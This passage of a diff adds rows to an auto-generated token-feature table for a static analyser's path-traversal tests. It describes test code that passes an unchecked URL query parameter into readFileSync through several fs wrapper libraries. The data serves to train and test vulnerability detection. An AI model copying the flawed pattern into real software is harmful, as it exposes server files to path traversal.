res) | +| autogenerated/TaintedPath/other-fs-libraries.js:57:32:57:43 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:57:32:57:43 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:57:32:57:43 | readFileSync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:57:46:57:49 | path | CalleeFlexibleAccessPath | import(!)() | | autogenerated/TaintedPath/other-fs-libraries.js:57:46:57:49 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:57:46:57:49 | path | calleeImports | util.promisify | @@ -10154,6 +81556,41 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:57:46:57:49 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | | autogenerated/TaintedPath/other-fs-libraries.js:57:46:57:49 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:57:46:57:49 | path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:59:3:59:9 | require | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:59:3:59:9 | require | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:59:3:59:9 | require | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:59:3:59:9 | require | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:59:3:59:9 | require | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:59:3:59:20 | exceptional return of require("thenify") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:59:3:59:20 | exceptional return of require("thenify") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:59:3:59:20 | exceptional return of require("thenify") | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:59:3:59:20 | exceptional return of require("thenify") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:59:3:59:20 | exceptional return of require("thenify") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:59:3:59:20 | require("thenify") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:59:3:59:20 | require("thenify") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:59:3:59:20 | require("thenify") | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:59:3:59:20 | require("thenify") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:59:3:59:20 | require("thenify") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:59:3:59:37 | exceptional return of require ... leSync) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:59:3:59:37 | exceptional return of require ... leSync) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:59:3:59:37 | exceptional return of require ... leSync) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:59:3:59:37 | exceptional return of require ... leSync) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:59:3:59:37 | exceptional return of require ... leSync) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:59:3:59:37 | require ... leSync) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:59:3:59:37 | require ... leSync) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:59:3:59:37 | require ... leSync) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:59:3:59:37 | require ... leSync) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:59:3:59:37 | require ... leSync) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:59:3:59:43 | exceptional return of require ... )(path) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:59:3:59:43 | exceptional return of require ... )(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:59:3:59:43 | exceptional return of require ... )(path) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:59:3:59:43 | exceptional return of require ... )(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:59:3:59:43 | exceptional return of require ... )(path) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:59:3:59:43 | require ... )(path) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:59:3:59:43 | require ... )(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:59:3:59:43 | require ... )(path) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:59:3:59:43 | require ... )(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:59:3:59:43 | require ... )(path) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:59:11:59:19 | "thenify" | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/other-fs-libraries.js:59:11:59:19 | "thenify" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:59:11:59:19 | "thenify" | calleeImports | | @@ -10162,6 +81599,11 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:59:11:59:19 | "thenify" | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | | autogenerated/TaintedPath/other-fs-libraries.js:59:11:59:19 | "thenify" | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:59:11:59:19 | "thenify" | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:59:22:59:23 | fs | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:59:22:59:23 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:59:22:59:23 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:59:22:59:23 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:59:22:59:23 | fs | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:59:22:59:36 | fs.readFileSync | CalleeFlexibleAccessPath | import(!) | | autogenerated/TaintedPath/other-fs-libraries.js:59:22:59:36 | fs.readFileSync | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:59:22:59:36 | fs.readFileSync | calleeImports | thenify | @@ -10170,6 +81612,11 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:59:22:59:36 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | | autogenerated/TaintedPath/other-fs-libraries.js:59:22:59:36 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:59:22:59:36 | fs.readFileSync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:59:25:59:36 | readFileSync | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:59:25:59:36 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:59:25:59:36 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:59:25:59:36 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:59:25:59:36 | readFileSync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:59:39:59:42 | path | CalleeFlexibleAccessPath | import(!)() | | autogenerated/TaintedPath/other-fs-libraries.js:59:39:59:42 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:59:39:59:42 | path | calleeImports | thenify | @@ -10178,6 +81625,36 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:59:39:59:42 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | | autogenerated/TaintedPath/other-fs-libraries.js:59:39:59:42 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:59:39:59:42 | path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:61:9:61:15 | readPkg | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:61:9:61:15 | readPkg | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:61:9:61:15 | readPkg | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:61:9:61:15 | readPkg | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:61:9:61:15 | readPkg | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:61:9:61:37 | readPkg | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:61:9:61:37 | readPkg | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:61:9:61:37 | readPkg | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:61:9:61:37 | readPkg | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:61:9:61:37 | readPkg | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:61:9:61:37 | readPkg ... d-pkg') | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:61:9:61:37 | readPkg ... d-pkg') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:61:9:61:37 | readPkg ... d-pkg') | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:61:9:61:37 | readPkg ... d-pkg') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:61:9:61:37 | readPkg ... d-pkg') | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:61:19:61:25 | require | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:61:19:61:25 | require | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:61:19:61:25 | require | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:61:19:61:25 | require | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:61:19:61:25 | require | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:61:19:61:37 | exceptional return of require('read-pkg') | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:61:19:61:37 | exceptional return of require('read-pkg') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:61:19:61:37 | exceptional return of require('read-pkg') | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:61:19:61:37 | exceptional return of require('read-pkg') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:61:19:61:37 | exceptional return of require('read-pkg') | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:61:19:61:37 | require('read-pkg') | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:61:19:61:37 | require('read-pkg') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:61:19:61:37 | require('read-pkg') | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:61:19:61:37 | require('read-pkg') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:61:19:61:37 | require('read-pkg') | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:61:27:61:36 | 'read-pkg' | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/other-fs-libraries.js:61:27:61:36 | 'read-pkg' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:61:27:61:36 | 'read-pkg' | calleeImports | | @@ -10186,6 +81663,41 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:61:27:61:36 | 'read-pkg' | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | | autogenerated/TaintedPath/other-fs-libraries.js:61:27:61:36 | 'read-pkg' | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:61:27:61:36 | 'read-pkg' | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:62:7:62:9 | pkg | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:62:7:62:9 | pkg | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:62:7:62:9 | pkg | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:62:7:62:9 | pkg | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:62:7:62:9 | pkg | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:62:7:62:48 | pkg = r ... path}) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:62:7:62:48 | pkg = r ... path}) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:62:7:62:48 | pkg = r ... path}) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:62:7:62:48 | pkg = r ... path}) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:62:7:62:48 | pkg = r ... path}) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:62:13:62:19 | readPkg | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:62:13:62:19 | readPkg | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:62:13:62:19 | readPkg | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:62:13:62:19 | readPkg | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:62:13:62:19 | readPkg | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:62:13:62:35 | readPkg ... ageSync | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:62:13:62:35 | readPkg ... ageSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:62:13:62:35 | readPkg ... ageSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:62:13:62:35 | readPkg ... ageSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:62:13:62:35 | readPkg ... ageSync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:62:13:62:48 | exceptional return of readPkg ... path}) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:62:13:62:48 | exceptional return of readPkg ... path}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:62:13:62:48 | exceptional return of readPkg ... path}) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:62:13:62:48 | exceptional return of readPkg ... path}) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:62:13:62:48 | exceptional return of readPkg ... path}) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:62:13:62:48 | readPkg ... path}) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:62:13:62:48 | readPkg ... path}) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:62:13:62:48 | readPkg ... path}) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:62:13:62:48 | readPkg ... path}) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:62:13:62:48 | readPkg ... path}) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:62:21:62:35 | readPackageSync | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:62:21:62:35 | readPackageSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:62:21:62:35 | readPackageSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:62:21:62:35 | readPackageSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:62:21:62:35 | readPackageSync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:62:37:62:47 | {cwd: path} | CalleeFlexibleAccessPath | readPkg.readPackageSync | | autogenerated/TaintedPath/other-fs-libraries.js:62:37:62:47 | {cwd: path} | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:62:37:62:47 | {cwd: path} | calleeImports | read-pkg | @@ -10195,6 +81707,21 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:62:37:62:47 | {cwd: path} | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:62:37:62:47 | {cwd: path} | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:62:37:62:47 | {cwd: path} | receiverName | readPkg | +| autogenerated/TaintedPath/other-fs-libraries.js:62:38:62:40 | cwd | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:62:38:62:40 | cwd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:62:38:62:40 | cwd | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:62:38:62:40 | cwd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:62:38:62:40 | cwd | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:62:38:62:46 | cwd: path | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:62:38:62:46 | cwd: path | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:62:38:62:46 | cwd: path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:62:38:62:46 | cwd: path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:62:38:62:46 | cwd: path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg 